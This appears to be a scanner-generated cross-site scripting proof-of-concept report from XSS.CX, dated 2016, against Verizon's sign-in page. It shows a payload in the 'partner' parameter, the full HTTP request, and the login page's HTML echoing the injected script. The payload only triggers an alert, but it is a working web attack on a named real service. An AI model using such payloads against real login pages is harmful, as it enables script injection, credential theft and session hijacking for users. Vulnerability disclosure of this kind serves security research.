XSS.CX Home | Blog | XSS Filter Evasion

XSS, Javascript Injection, Partner Parameter, signin.verizon.com

XSS Proof of Concept by XSS.Cx

Target URL High Medium Low Info
Report1511

Alert Detail Click here to hide all alerts

Hide the alert
XSS - Javascript InjectionCross Site Scripting
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/VOLPortalLogin

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ";alert(1)// was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /sso/VOLPortalLogin?partner=hgtv80202"%3balert(1)%2f%2f188 HTTP/1.1
Host: signin.verizon.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 24 Feb 2016 03:08:24 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: VZSSOCOM_SESSIONID=xsscx; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20084









<!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge">
       <title>Verizon FiOS - sign in</title>
       <script type="text/javascript" src="//nexus.ensighten.com/verizon/Bootstrap.js"></script>
       <meta name="description" content="">
       <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame -->
       <meta http-equiv="X-UA-Compatible" content="IE=edge">
       <meta name="viewport" content="width=device-width, initial-scale=1">

       <link href="/sso/resources/css/tvzipcode/vzrf.css" rel="stylesheet" />
       <link href="/sso/resources/css/tvzipcode/app.css" rel="stylesheet" />
       <!--[if IE 9]>
           <link href="/sso/resources/css/tvzipcode/vzrf-oldie2.css" rel="stylesheet" />
           <link href="/sso/resources/css/tvzipcode/vzrf-oldie3.css" rel="stylesheet" />
       <![endif]-->
       
       <!-- JavaScript plugins (requires jQuery) -->
       <script src="/sso/resources/js/tvonline/jquery.js"></script>
       <script type="text/javascript">
       function Validate() {
           var theUsername = document.tvlogin.IDToken1.value;
           var thePassword = document.tvlogin.IDToken2.value;
           var theZipcode;
           if(document.getElementById('zipcode-txt')) {
               theZipcode = document.tvlogin.zipcode.value;
           }
           
           // scLinkTrack('prop11=sso| tve| signin| signin^prop27=signin^prop37=sso| tve| signin');
           scLinkTrackID('signin');
           
           if(theUsername == '' || theUsername == null) {
        document.getElementById('IDToken1').focus();
               if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
               $("#IDToken2").removeClass("error");
        document.getElementById('uidAlert1').style.display='block';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
        return false;
        }
        else if(theUsername.length > 60) {
        document.getElementById('IDToken1').focus();
               if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
               $("#IDToken2").removeClass("error");
        document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='block';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
        }
           else if(!(/^[A-Za-z0-9_@'.+-]*$/.test(theUsername))) {
        document.getElementById('IDToken1').focus();
               if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
               $("#IDToken2").removeClass("error");
        document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='block';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(thePassword.length < 1) {
               document.getElementById('IDToken2').focus();
               if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
               $("#IDToken1").removeClass("error");
               document.getElementById('pwdAlert1').style.display='block';
           document.getElementById('pwdAlert2').style.display='none';
           document.getElementById('pwdAlert3').style.display='none';
        document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(thePassword.length < 6) {
               document.getElementById('IDToken2').focus();
               if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
               $("#IDToken1").removeClass("error");
               document.getElementById('pwdAlert1').style.display='none';
               document.getElementById('pwdAlert2').style.display='block';
           document.getElementById('pwdAlert3').style.display='none';
           document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(thePassword.length > 24) {
            document.getElementById('IDToken2').focus();
               if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
               $("#IDToken1").removeClass("error");
            document.getElementById('pwdAlert1').style.display='none';
           document.getElementById('pwdAlert2').style.display='none';
           document.getElementById('pwdAlert3').style.display='block';
           document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(document.getElementById('zipcode-txt')) {
               if(theZipcode.length == 0 || theZipcode.length < 5 || !/(^\d{5}$)|(^\d{5}-\d{4}$)/.test(theZipcode)) {
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").addClass("error");        
                   $("#IDToken1").removeClass("error");                    
                   $("#IDToken2").removeClass("error");
                   document.getElementById('zipcode-txt').focus();
                   document.getElementById('pwdAlert1').style.display='none';
                   document.getElementById('pwdAlert2').style.display='none';
                   document.getElementById('pwdAlert3').style.display='none';
                   document.getElementById('uidAlert1').style.display='none';
                   document.getElementById('uidAlert2').style.display='none';
                   document.getElementById('uidAlert3').style.display='none';
                   document.getElementById('loginAlert').style.display='none';
                   document.getElementById('zipAlert').style.display='block';                    
                   return false;
               }
           }
           
           //document.getElementById('tvloginsignin').click();
           document.tvlogin.submit();
           return false;
       }
       
       function putFocus() {
           
           if(document.getElementById('zipcode-txt')) {
               document.getElementById('zipcode-txt').focus();
           } else if(document.tvlogin != null){
               document.tvlogin.IDToken1.focus();
           }
           
       }
       
       function showInputError(errorMsg) {
           /*document.getElementById('userid').className='col-sm-5 col-lg-6 error';
           document.getElementById('passwd').className='col-sm-5 col-lg-6 error';*/
           document.getElementById('errormsgtxt').style.display='block';
           document.getElementById("errormsgtxt").innerHTML=errorMsg;
       }
               
       function ClickCancel() {
           scLinkTrackID('cancel');
           window.location='https://sp.auth.adobe.com/adobe-services/1.0/session?cancelled=1&_method=POST&mso_id=Verizon&redirect_url=http%3A%2F%2Fwatch.hgtv.com%2Factivate%2Fthanks.html%23Roku%26HGTV';
       }
       
       function clear_fields() {
           for( var n = 0; n < document.forms.length; n++ ) {
               for(var i = 0; i < document.forms[n].elements.length; i++) {
                   if( document.forms[n].elements[i].type == 'text') {
                       document.forms[n].elements[i].value = '';
                   }
                   if( document.forms[n].elements[i].type == 'password') {
                       document.forms[n].elements[i].value = '';
                   }
               }
           }
       }
       
       function NewCustomer() {
           scLinkTrackID('not vz ec');
           window.location='http://www.verizon.com/';
       }
       function RegisterUser() {
           scLinkTrackID('reg new acct');
           window.location='https://myverizonid.verizon.com/accessmanager/public/c/reg/start?choose=y&goto=https%3A%2F%2Fwww.verizon.com%2FForYourHome%2Fmyaccount%2Fngen%2Fpr%2Fhome%2Fmyverizon.aspx%3Freferrer%3Dregister';
       }
       function forgotSC() {
           scLinkTrackID('forgot un+pw');
       }
       function PrivacyPolicy() {
           scLinkTrackID('privacy');
           document.location.href='http://www.verizon.com/privacy/';
       }
       function OrderFios() {
           window.location='http://www.verizon.com/foryourhome/goflow/nationalbundles/bundlequalify.aspx';
       }
       function OrderPartner() {
           window.location='https://www.verizon.com/ForYourHome/GoFlow/MyVerizonnew/acslogin.aspx?FlowRoute=URC_UPGRADE&URCSOURCE=tve_generic';
       }
       
       $("#tvlogin").keypress(function(event) {
           if(event.which == 13){
               Validate();
           }
       });
       
       function activateChannel() {
           var xmlHttp;
           try
            {
            // Firefox, Opera 8.0+, Safari
            xmlHttp=new XMLHttpRequest();
            }
           catch (e)
            {
            // Internet Explorer
            try
            {
            xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
            }
            catch (e)
            {
            try
            {
            xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
            }
            catch (e)
            {
            alert("Your browser does not support AJAX!");

            }
            }
            }
            xmlHttp.onreadystatechange=function()
            {
            if(xmlHttp.readyState==4)
            {
                   //Submit the form to the TV Partner with SAML Response
                   $("form[name='cpsubmitter']").attr('method', 'post');
                   $("form[name='cpsubmitter']").attr('action', 'null');
               if("_top" == 'null') {
                   $("form[name='cpsubmitter']").attr('target', 'null');
               }
                   $("input[name='SAMLResponse']").val('null');
                   $("input[name='RelayState']").val('_00e50d14-1689-4eb7-b6f0-b40c58c6b19b');
                   $("input[name='targetValue']").val('null');
               $("form[name='cpsubmitter']").submit();
                }
            }
            xmlHttp.open("POST", "https://signin.verizon.com/sso/TVPActivationServlet?shadowisoc=null", true);
            xmlHttp.setRequestHeader('Content-Type','text/html');
            xmlHttp.send(null);
       }
       
       $("#tvactivation").keypress(function(event) {
           if(event.which == 13){
               activateChannel();
           }
       });
       </script>
       
   </head>
   <body onLoad="putFocus();">

       <!-- Start for Site Catalyst -->
       <script type="text/javascript">
           var s_account="verizontelecomglobal,verizontelecomsso";
       </script>
       <script language="javascript" src="//www.verizon.com/includes/javascript/omnicode.js"></script>
       <script type="text/javascript">
       if(typeof (s_837) != "undefined") {
           var error = "null";
           var partner = "hgtv";alert(1)//";
           if(error != null && error == "SAM"){
               s_837.simplepageName="tve| signin| error| incorrect uid pwd";
               s_837.detailpageName="tve| signin| error| incorrect uid pwd| hgtv80202";alert(1)//188";
           } else if(error != null && error == "NOTENTITLEDUSER"){
               s_837.simplepageName="tve| signin| error| notentitled";
               s_837.detailpageName="tve| signin| error| notentitled| hgtv80202";alert(1)//188";
           } else if(error != null && error == "NOTFiOSTVUSER"){
               s_837.simplepageName="tve| signin| error| notfios";
               s_837.detailpageName="tve| signin| error| notfios| hgtv80202";alert(1)//188";
           } else if(error != null && error == "MAINTENANCE"){
               s_837.simplepageName="tve| signin| error| maintenance";
               s_837.detailpageName="tve| signin| error| maintenance| hgtv80202";alert(1)//188";
           } else {
               s_837.simplepageName="tve| signin";
               s_837.detailpageName="tve| signin| hgtv80202";alert(1)//188";
           }
           s_837.pfxID="sso";
           s_837.prop2="res myverizon";
           s_837.prop3="tve sso";
           s_837.prop4="/vz/residential/myverizon/tve/sso";
           s_837.prop6="myverizon";
           s_837.prop40="res| sso iframe";
           s_837.prop48="tve";
           if(error != null && error != "" && error != "null") {
               s_837.events="event21";        
           } else {
               s_837.events="";
           }
       }
       </script>
       <script type="text/javascript" language="javascript">
           var s_code=s_837.t();if(s_code)document.write(s_code);
       </script>
       <!-- End for Site Catalyst -->

       <section>
           <main class="main
                       tiny-12 small-10 large-5
                       border-all border-grey-5 border-all-large
                       padding-top-small margin-top-small padding-bottom-tiny                
                   large-narrow">
               <!-- ## Header -->
               <div class="row">
                   <div class="tiny-12 large-6 columns">
                       <img src="/sso/resources/images/tvzipcode/vzlogo_med.png" alt="Verizon FiOS" title="Verizon FiOS" class="mw-medium tiny-12">
                   </div>
                   
               </div>

               <div class="row" style="display:block">
                   <div class="columns">
                   
                       <p class="text-large padding-top-small">Sign in with your Verizon Residential account info.</p>
                   
                   </div>
                   
                   <!-- Server login error messages -->
                   <div class="columns">
                   <div class="error-msg padding-top-small" id="loginAlert" >We're sorry, but either the User ID or Password entered is not correct. Please try again.</div>
                   </div>

                   <div class=" columns">
                       <!-- ## Form -->
                       <form data-parsley-validate="" novalidate name="tvlogin" method="post" autocomplete="off" action="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&goto=https://signin.verizon.com/sso/choice/tvpHandler.jsp?loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV&clientId=TvLogin&partner=hgtv80202";alert(1)//188&errorURL=https://signin.verizon.com/sso/VOLPortalLogin?src%3DSAM%26loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV">
                        <input type="hidden" name="cookiedomain" id="cookiedomain" value=".verizon.com" />
                        <input type="hidden" name="amLoginUrl" value="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&goto=https://signin.verizon.com/sso/choice/tvpHandler.jsp?loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV&clientId=TvLogin&partner=hgtv80202";alert(1)//188&errorURL=https://signin.verizon.com/sso/VOLPortalLogin?src%3DSAM%26loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV" />
                        <input type="hidden" name="stid" value="off" />
                        <input type="hidden" name="forceprofile" value="off" />
                        <input type="hidden" name="seclock" value="off" />
                        <input type="hidden" name="vzw" value ="off" >
                            <div class="row">
                               <div class="columns">
                                   

                                   <label for="IDToken1" class="hide-for-small-down">User ID</label>
                                   <input type="text" id="IDToken1" name="IDToken1" class="" autocomplete="off" placeholder="User ID" value="">
                                   <div class="error-msg" id="uidAlert1">Please enter your User ID</div>
                                   <div class="error-msg" id="uidAlert2">Username can not be longer than 60 characters</div>
                                   <div class="error-msg" id="uidAlert3">Please enter a User ID using letters, numbers or dots. Characters such as &, $, %, / or space may not be used.</div>

                                   <label for="IDToken2" class="hide-for-small-down">Password</label>
                                   <input type="Password" id="IDToken2" name="IDToken2" autocomplete="off" placeholder="Password">
                                   <div class="error-msg" id="pwdAlert1">Please enter your Password</div>
                                   <div class="error-msg" id="pwdAlert2">Password must contain at least 6 characters</div>
                                   <div class="error-msg" id="pwdAlert3">Password must contain less than 24 characters</div>
                                   
                                   <button id="tvloginsignin" class="button left signin" data-validate-form onClick="return Validate()">Sign In</button>
                                   <a href="https://signin.verizon.com/sso/forgotflows" class="forgotpwd" data-open-modal="ForgotUserOrPassword" onClick="forgotSC()">
                                   Forgot User ID or Password?
                                   </a>
                               </div><!-- .columns -->
                            </div><!-- .row -->
                       </form>
                       
                       <div class="row">
   <div class="columns">
       <a href="#" onClick="NewCustomer()">
       
                                   Not a Verizon Customer ?
                               
       </a> <br /> <br />
       <a href="#" onClick="RegisterUser()">
       
                                   Register a New Account
                               
                               </a> <br /> <br />
   </div>
</div>
                       
                       <!-- ## Big Buttons -->
                       <!-- div class="row">
                        <a href="#" class="text-white" onClick="NewCustomer()">
                           <div class="tiny-6 columns padding-right-zero">
                               <div class="panel theme-marketing">
                                   
                               </div>
                            </div>
                        </a>
                       </div-->

                       <!-- ## footer -->
                       &#64; 2016 Verizon
                       <a data-open-modal="PrivacyPolicy" href="javascript:void(0);" onClick="PrivacyPolicy()">Privacy Policy</a>
                   </div>
               </div>
               
               <!-- Channel Activation Section Starts -->
    <div class="row actcontent" style="display:none">
       
    </div>
               <!-- Channel Activation Section Ends -->
               <!-- Subscription Section Starts -->
               <div class="row subcontent" style="display:none">
                   
               </div>
               
           </main>
       </section>
       
   </body>
</html>

Proof of Concept - XSS executing in FF

FF PoC, DOM XSS, jQuery V1.7, Javascript Injection, deals.ebay.com, XSS.CX
Report generated by XSS.CX at Sat Mar 19 16:31:06 EDT 2016.